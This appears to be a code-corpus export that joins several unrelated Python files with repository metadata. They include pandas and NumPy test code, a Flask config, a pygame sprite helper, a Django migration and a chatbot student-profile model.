result = indexer_al(df)["a", "A"]
assert result == 1
with pytest.raises(KeyError, match="^0$"):
indexer_al(df)["a", 0]
def test_at_frame_multiple_columns(self):
# GH#48296 - at shouldn't modify multiple columns
df = DataFrame({"a": [1, 2], "b": [3, 4]})
new_row = [6, 7]
with pytest.raises(
InvalidIndexError,
match=f"You can only assign a scalar value not a \\{type(new_row)}",
):
df.at[5] = new_row
def test_at_getitem_mixed_index_no_fallback(self):
# GH#19860
ser = Series([1, 2, 3, 4, 5], index=["a", "b", "c", 1, 2])
with pytest.raises(KeyError, match="^0$"):
ser.at[0]
with pytest.raises(KeyError, match="^4$"):
ser.at[4]
def test_at_categorical_integers(self):
# CategoricalIndex with integer categories that don't happen to match
# the Categorical's codes
ci = CategoricalIndex([3, 4])
arr = np.arange(4).reshape(2, 2)
frame = DataFrame(arr, index=ci)
for df in [frame, frame.T]:
for key in [0, 1]:
with pytest.raises(KeyError, match=str(key)):
df.at[key, key]
def test_at_applied_for_rows(self):
# GH#48729 .at should raise InvalidIndexError when assigning rows
df = DataFrame(index=["a"], columns=["col1", "col2"])
new_row = [123, 15]
with pytest.raises(
InvalidIndexError,
match=f"You can only assign a scalar value not a \\{type(new_row)}",
):
df.at["a"] = new_row
| [
"[email protected]"
] | |
3730426a331bcc75745f9af0cdfc8efaf059a9b9 | 8eab8ab725c2132bb8d090cdb2d23a5f71945249 | /virt/Lib/site-packages/numpy/array_api/tests/test_elementwise_functions.py | b2fb44e766f8adfc368d988bd7d17c2ac418b386 | [
"GPL-3.0-only",
"BSD-3-Clause-Open-MPI",
"GPL-3.0-or-later",
"GCC-exception-3.1",
"BSD-3-Clause",
"MIT"
] | permissive | JoaoSevergnini/metalpy | 6c88a413a82bc25edd9308b8490a76fae8dd76ca | c2d0098a309b6ce8c756ff840bfb53fb291747b6 | refs/heads/main | 2023-04-18T17:25:26.474485 | 2022-09-18T20:44:45 | 2022-09-18T20:44:45 | 474,773,752 | 3 | 1 | MIT | 2022-11-03T20:07:50 | 2022-03-27T22:21:01 | Python | UTF-8 | Python | false | false | 3,619 | py | from inspect import getfullargspec
from numpy.testing import assert_raises
from .. import asarray, _elementwise_functions
from .._elementwise_functions import bitwise_left_shift, bitwise_right_shift
from .._dtypes import (
_dtype_categories,
_boolean_dtypes,
_floating_dtypes,
_integer_dtypes,
)
def nargs(func):
return len(getfullargspec(func).args)
def test_function_types():
# Test that every function accepts only the required input types. We only
# test the negative cases here (error). The positive cases are tested in
# the array API test suite.
elementwise_function_input_types = {
"abs": "numeric",
"acos": "floating-point",
"acosh": "floating-point",
"add": "numeric",
"asin": "floating-point",
"asinh": "floating-point",
"atan": "floating-point",
"atan2": "floating-point",
"atanh": "floating-point",
"bitwise_and": "integer or boolean",
"bitwise_invert": "integer or boolean",
"bitwise_left_shift": "integer",
"bitwise_or": "integer or boolean",
"bitwise_right_shift": "integer",
"bitwise_xor": "integer or boolean",
"ceil": "numeric",
"cos": "floating-point",
"cosh": "floating-point",
"divide": "floating-point",
"equal": "all",
"exp": "floating-point",
"expm1": "floating-point",
"floor": "numeric",
"floor_divide": "numeric",
"greater": "numeric",
"greater_equal": "numeric",
"isfinite": "numeric",
"isinf": "numeric",
"isnan": "numeric",
"less": "numeric",
"less_equal": "numeric",
"log": "floating-point",
"logaddexp": "floating-point",
"log10": "floating-point",
"log1p": "floating-point",
"log2": "floating-point",
"logical_and": "boolean",
"logical_not": "boolean",
"logical_or": "boolean",
"logical_xor": "boolean",
"multiply": "numeric",
"negative": "numeric",
"not_equal": "all",
"positive": "numeric",
"pow": "numeric",
"remainder": "numeric",
"round": "numeric",
"sign": "numeric",
"sin": "floating-point",
"sinh": "floating-point",
"sqrt": "floating-point",
"square": "numeric",
"subtract": "numeric",
"tan": "floating-point",
"tanh": "floating-point",
"trunc": "numeric",
}
def _array_vals():
for d in _integer_dtypes:
yield asarray(1, dtype=d)
for d in _boolean_dtypes:
yield asarray(False, dtype=d)
for d in _floating_dtypes:
yield asarray(1.0, dtype=d)
for x in _array_vals():
for func_name, types in elementwise_function_input_types.items():
dtypes = _dtype_categories[types]
func = getattr(_elementwise_functions, func_name)
if nargs(func) == 2:
for y in _array_vals():
if x.dtype not in dtypes or y.dtype not in dtypes:
assert_raises(TypeError, lambda: func(x, y))
else:
if x.dtype not in dtypes:
assert_raises(TypeError, lambda: func(x))
def test_bitwise_shift_error():
# bitwise shift functions should raise when the second argument is negative
assert_raises(
ValueError, lambda: bitwise_left_shift(asarray([1, 1]), asarray([1, -1]))
)
assert_raises(
ValueError, lambda: bitwise_right_shift(asarray([1, 1]), asarray([1, -1]))
)
| [
"[email protected]"
] | |
0dcf4b6b5bcf74c86dfbcba79e56758e85c90377 | 08c7844a2bd2d94d16e851ce78109a7f33ffc53f | /config.py | 58407e73518f4329eb385d50488e096f33660915 | [] | no_license | jreiher2003/menu-app | dd5bd4a44688f43086f6a284684ebafff74daf2a | cc93f6a41539ab00b2d85bae21ee308987c93afe | refs/heads/master | 2021-01-10T09:26:51.673657 | 2015-11-17T19:11:25 | 2015-11-17T19:11:25 | 46,355,082 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 300 | py | WTF_CSRF_ENABLED = True
SECRET_KEY = 'you-will-never-guess'
import os
basedir = os.path.abspath(os.path.dirname(__file__))
SQLALCHEMY_TRACK_MODIFICATIONS = True
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'menu.db')
SQLALCHEMY_MIGRATE_REPO = os.path.join(basedir, 'db_repository') | [
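# Illustrative sketch (editor's addition, not part of the original config.py):
# how a Flask application could consume the settings above. In the source
# project this would normally live in the app package (e.g. app/__init__.py)
# as app.config.from_object('config'); the use of Flask-SQLAlchemy here is an
# assumption about the surrounding project.
if __name__ == "__main__":
    from flask import Flask
    from flask_sqlalchemy import SQLAlchemy

    app = Flask(__name__)
    app.config.from_object(__name__)  # picks up the upper-case constants above
    db = SQLAlchemy(app)              # connects via SQLALCHEMY_DATABASE_URI
    print(app.config["SQLALCHEMY_DATABASE_URI"])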
"[email protected]"
] | |
b517f0bb5ca6346a38ef4745c26d781ed5b2d2cd | e83f2198cb765f048398e6485f138cf4e172199f | /src/pywaz/sprite/__init__.py | 2b4fa577eabb5f9d7b1f852d71ca2119cee7f2c3 | [] | no_license | giginet/MachiMatch | 6d1c2cb2a77323043e8e04e90df5d5e1d8e010d5 | 69b0e788f75966bf6e2fbfaba19e66da5ce22415 | refs/heads/master | 2021-01-13T01:36:19.399768 | 2011-12-25T02:40:10 | 2011-12-25T02:40:10 | 1,630,776 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,221 | py | import pygame
from pygame.sprite import Sprite
class _Mixin(object):
def draw(self, surface):
for sprite in self.sprites():
if isinstance(sprite, Sprite):
sprite.draw(surface)
else:
surface.blit(sprite.image, sprite.rect)
class _Mixin2(object):
def draw(self, surface):
spritedict = self.spritedict
surface_blit = surface.blit
dirty = self.lostsprites
self.lostsprites = []
dirty_append = dirty.append
for s in self.sprites():
r = spritedict[s]
if isinstance(s, Sprite):
newrect = s.draw(surface)
else:
newrect = surface_blit(s.image, s.rect)
            if r == 0:  # sprite has not been drawn yet
dirty_append(newrect)
else:
if newrect and newrect.colliderect(r):
dirty_append(newrect.union(r))
elif newrect:
dirty_append(newrect)
dirty_append(r)
spritedict[s] = newrect
return dirty
# group -----------------------------------------------------------------------------------
#
# Notice:
#     The order of inheritance is IMPORTANT
#
class Group(_Mixin, pygame.sprite.Group):
pass
class RenderUpdates(_Mixin2, pygame.sprite.RenderUpdates):
pass
class OrderedUpdates(_Mixin2, pygame.sprite.OrderedUpdates):
pass
class LayeredUpdates(_Mixin2, pygame.sprite.LayeredUpdates):
pass
# collide ---------------------------------------------------------------------------------
#
# Notice:
#     Only `collide_rect` and `spritecollide` are modified
#
from pygame.sprite import collide_rect_ratio
from pygame.sprite import collide_circle, collide_circle_ratio
from pygame.sprite import collide_mask
from pygame.sprite import groupcollide, spritecollideany
def collide_rect(left, right):
u"""collision detection between two sprites, using `colrect` of each sprite"""
return left.coltest_rect.colliderect(right.coltest_rect)
def spritecollide(sprite, group, dokill, collided = None):
if collided is None:
collided = collide_rect
return pygame.sprite.spritecollide(sprite, group, dokill, collided)
| [
"[email protected]"
] | |
5e7eae6b648b87e1195f66e8de1baf28ed5cc3b4 | 176088b355fd48f89aa377d1358bc54fd5d9d35d | /backend/task_category/migrations/0001_initial.py | 9093194c12138f4db006dc787f9880e94c74f40c | [] | no_license | crowdbotics-apps/fashion-by-genesis-18024 | bbf2c78adaefcaf5297b208a23d291ec8c7b0f0f | a725add80913c3ecb4f9e049baa3c78c8de3ffbd | refs/heads/master | 2022-10-26T19:09:33.359374 | 2020-06-11T18:21:20 | 2020-06-11T18:21:20 | 271,617,523 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,239 | py | # Generated by Django 2.2.13 on 2020-06-11 18:20
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('icon', models.URLField()),
('description', models.TextField(blank=True, null=True)),
('is_recurring', models.BooleanField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='Subcategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('description', models.TextField(blank=True, null=True)),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='subcategory_category', to='task_category.Category')),
],
),
]
| [
"[email protected]"
] | |
5b93c2a71b7fe9860423932a99487ea380b7ad1b | e7307703a08ccdc0615bfa3b7a963a2ba2e9e732 | /bots/courses_bot/data_models/student_profile.py | 8f2b9d06af726a5cb4e8919a976c563d36878473 | [] | no_license | liyocee/cs_course_bot | 7817c43975c56aeb6edf31d28d9a7f553d107c26 | 93354ade3713293bf31a494a75bd11c3229814a8 | refs/heads/master | 2023-05-24T23:29:34.309303 | 2020-03-15T14:37:15 | 2020-03-15T14:37:15 | 246,835,877 | 0 | 0 | null | 2023-05-22T22:42:22 | 2020-03-12T13:03:32 | Python | UTF-8 | Python | false | false | 707 | py | from enum import Enum
from typing import Optional
from botbuilder.schema import Attachment
from .course_unit import CourseUnit
class StudentProfile:
def __init__(
self,
name: str = None,
admission_number: str = None,
course_unit: CourseUnit = None,
picture: Attachment = None
):
self.name: Optional[str] = name
self.admission_number: Optional[str] = admission_number
self.course_unit: Optional[CourseUnit] = course_unit
self.picture: Optional[Attachment] = picture
class StudentProfileAttributes(Enum):
NAME = "name"
ADMISSION_NUMBER = "admission_number"
COURSE_UNIT = "course_unit"
PICTURE = "picture"
| [
"[email protected]"
] |